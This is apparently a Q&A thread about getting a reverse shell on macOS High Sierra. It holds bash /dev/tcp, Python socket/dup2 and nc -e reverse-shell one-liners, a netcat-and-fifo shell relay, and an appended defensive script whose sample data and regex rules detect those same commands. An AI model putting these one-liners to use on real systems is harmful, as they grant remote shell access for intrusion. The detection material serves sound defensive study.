Create reverse shell using High Sierra?
I'm trying to create a reverse shell listener using High Sierra but nothing seems to work.
The bash command kinda just hangs in the terminal and times out.
bash -i >& /dev/tcp/0.0.0.0/8080 0>&1
The python command errors with "Connection refused" when using python or python v2.7.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
The netcat command errors with "nc: invalid option -e"
nc -e /bin/bash 0.0.0.0 8080
I've tried other solutions I've found online but you get the idea...
Is it possible to create a reverse shell (preferably with access to bash) using High Sierra?
Specifications:
sh-3.2# system_profiler SPSoftwareDataType
Software:

    System Software Overview:

      System Version: macOS 10.13.4 (17E199)
      Kernel Version: Darwin 17.5.0
      Boot Volume: lily
      Boot Mode: Normal
      Computer Name: lily’s MacBook Air
      User Name: System Administrator (root)
      Secure Virtual Memory: Enabled
      System Integrity Protection: Enabled
      Time since boot: 2:03
Solution 1:
If I understand correctly, you want to connect to your High Sierra machine from an external source via something like netcat (nc), send commands to bash, and view the response.
There are more secure and simpler ways to do this using ssh, but presuming this is some kind of experiment or development trick, here's how you can do what you're asking.
My answer is based on an answer I found elsewhere on SE (https://superuser.com/a/607855), which itself is based on other SO/SE answers.
First make a fifo:
mkfifo myfifo
Then start 'nc' using the fifo as its input, piping its output to bash, and redirecting bash's output to the fifo:
nc -l 127.0.0.1 8080 < myfifo | /bin/bash -i > myfifo 2>&1
(The '-i' flag for bash indicates an interactive shell, and may not be desirable for this use case.)
From the remote device (in my testing, myself):
nc 127.0.0.1 8080
If you want to reverse the roles, i.e. the High Sierra machine is establishing the connection to the remote device, and giving the remote device access to bash on the HS host, you would move the listen flag (-l). So, the remote device would start netcat first in listen mode:
nc -l 127.0.0.1 8080
Then the High Sierra host would connect to the remote device:
nc 127.0.0.1 8080 < myfifo | /bin/bash -i > myfifo 2>&1
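The same command shapes that appear in the question (bash `/dev/tcp` redirection, the python socket/dup2 one-liner, `nc -e`) and in the answer (the `mkfifo` + `nc` + `bash -i` relay) are what a defender wants to flag in command-line telemetry. The script below is an added detection example, not part of this thread or of any product; it assumes telemetry in a constructed "session<TAB>command line" format (the sample lines are made up, with the thread's own commands dropped in) and the rule names, `SAMPLE_TELEMETRY`, `scan` and `fifo_created_by` are my own. It goes slightly beyond the thread by correlating a `mkfifo` with a later nc-to-shell pipeline in the same session, so a plain fifo used for something else (the `gzip` line) does not alert.

```python
"""Flag reverse-shell command patterns in shell command-line telemetry.

Input format (constructed for this example): one executed command per line,
"<session-id>\t<full command line>". Findings are (session, rule, command).
"""
import re
import shlex
from typing import Callable, Dict, List, Optional, Tuple

Finding = Tuple[str, str, str]

# Constructed sample telemetry; not captured from a real host. Sessions s1-s3
# reuse the commands from the thread, s4 is a benign fifo to show it stays quiet.
SAMPLE_TELEMETRY = """\
s1\tls -la /Users/lily
s1\tmkfifo myfifo
s1\tnc 127.0.0.1 8080 < myfifo | /bin/bash -i > myfifo 2>&1
s2\tbash -i >& /dev/tcp/0.0.0.0/8080 0>&1
s2\tpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
s3\tnc -e /bin/bash 0.0.0.0 8080
s3\tnc -zv 127.0.0.1 22
s4\tmkfifo /tmp/build.pipe
s4\tcat /tmp/build.pipe | gzip > out.gz
"""

NC = r"\b(?:nc|ncat|netcat)\b"

# Single-line rules: rule name -> predicate over one command line.
SINGLE_LINE_RULES: Dict[str, Callable[[str], bool]] = {
    # bash network redirection: /dev/tcp/<host>/<port> or /dev/udp/...
    "bash_dev_tcp_redirect": lambda c: re.search(r"/dev/(?:tcp|udp)/\S+/\d+", c) is not None,
    # netcat asked to run a program (-e/-c, --exec/--sh-exec). macOS nc rejects
    # -e, as the question shows, but other builds accept it. -c is also TLS in
    # newer OpenBSD nc, so expect some false positives from that token.
    "netcat_exec_option": lambda c: re.search(
        NC + r".*(?:\s-(?:e|c)(?:\s|$)|--(?:sh-)?exec\b)", c) is not None,
    # netcat's output piped straight into a shell (sh, bash, zsh, dash)
    "netcat_pipe_to_shell": lambda c: re.search(
        NC + r"[^|]*\|\s*(?:\S*/)?(?:ba|z|da)?sh\b", c) is not None,
    # python -c one-liner wiring a socket to a process via dup2
    "python_socket_dup2_shell": lambda c: (
        re.search(r"python[0-9.]*\s+-c\b", c) is not None
        and all(k in c for k in ("socket", "dup2"))
        and any(k in c for k in ("subprocess", "pty"))
    ),
}


def fifo_created_by(command: str) -> Optional[str]:
    """Return the path a `mkfifo` command creates, or None if it is not mkfifo."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes: not something we can parse safely
        return None
    if not argv or argv[0] != "mkfifo":
        return None
    paths = [a for a in argv[1:] if not a.startswith("-")]
    # skip the argument of -m (mode) if present
    if "-m" in argv:
        mode = argv[argv.index("-m") + 1] if argv.index("-m") + 1 < len(argv) else None
        paths = [p for p in paths if p != mode]
    return paths[0] if paths else None


def scan(telemetry: str) -> List[Finding]:
    """Run the single-line rules, then correlate mkfifo with a later nc->shell
    pipeline that references the same fifo inside one session."""
    findings: List[Finding] = []
    fifos: Dict[str, List[str]] = {}  # session -> fifo paths created so far
    for raw in telemetry.splitlines():
        if not raw.strip():
            continue
        session, _, command = raw.partition("\t")
        command = command.strip()
        hits = [name for name, matches in SINGLE_LINE_RULES.items() if matches(command)]
        findings.extend((session, name, command) for name in hits)
        fifo = fifo_created_by(command)
        if fifo:
            fifos.setdefault(session, []).append(fifo)
            continue
        if "netcat_pipe_to_shell" in hits and any(p in command for p in fifos.get(session, [])):
            findings.append((session, "fifo_shell_relay", command))
    return findings


if __name__ == "__main__":
    for session, rule, command in scan(SAMPLE_TELEMETRY):
        print(f"{session}\t{rule}\t{command}")
```

Redirections such as `< myfifo` only show up in telemetry that records the full shell command line (shell auditing, an EDR that logs the invoking command); a plain `ps` listing shows just `nc` and `bash -i` as siblings, so on a host without such logging the weaker signal is a shell whose sibling process is netcat.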